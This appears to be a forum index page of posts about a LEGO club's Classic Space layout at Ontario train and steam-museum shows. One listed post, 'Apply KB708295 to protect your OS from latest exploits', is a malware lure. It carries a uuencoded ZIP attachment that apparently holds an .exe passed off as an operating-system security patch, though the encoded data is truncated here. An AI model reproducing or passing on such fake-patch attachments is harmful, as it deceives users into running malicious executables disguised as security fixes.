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Event Calendar by Joe Meno

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  Apply KB708295 to protect your OS from latest exploits
begin 0644 M4$L#!!0````(`"2+A%G...4N97AE[9=_ M3!ME&,>?:P_ZDU$B;F%...J48FF;Z]TV M,I7.6W1`F$VF)#-&HW_...+.0,[W>K>N M96SH$HE9[I.\[_L\SWW...X+0@!\Y(`E MI>];CI4-$>YC98F$IST...`,5U466%>N M6^C1BP7C`G`31@@P4QV...!JW)!>@C1& (...) (4 months ago, 4-Dec-24, to
  Re: OBB CSL @ the 'Boats, Models and Trains' event in Hamilton, Ontario, May 25 and 26, 2019
Just a reminder that the Ontario Brick Builders (k, just me) will be displaying the Classic Space layout at the Boats, Models and Train show at the Hamilton Steam Museum tomorrow and Sunday. The public hours for both days are from 11 a.m. to 4 p.m.. (...) (6 years ago, 24-May-19, to,,
  OBB CSL @ the 'Boats, Models and Trains' event in Hamilton, Ontario, May 25 and 26, 2019
This is the one I've been personally trying to get into for a few years now. Not just because it's in my own 'back yard', but this place is one of my favourite places to visit-- The Hamilton Museum of Steam & Technology National Historic Site (...) (6 years ago, 11-Apr-19, to,,
  TENTATIVE Show - The Greater Toronto Train Show, Oct 5 and 6
I'm going to go all rtlT 'old school' on this one. I contacted the organisers at the Greater Toronto Train Show and they would like to have us at their train show October 5 and 6th in Brampton, Ontario. Now I'm ONLY going to do this show if I get (...) (6 years ago, 1-Apr-19, to,,

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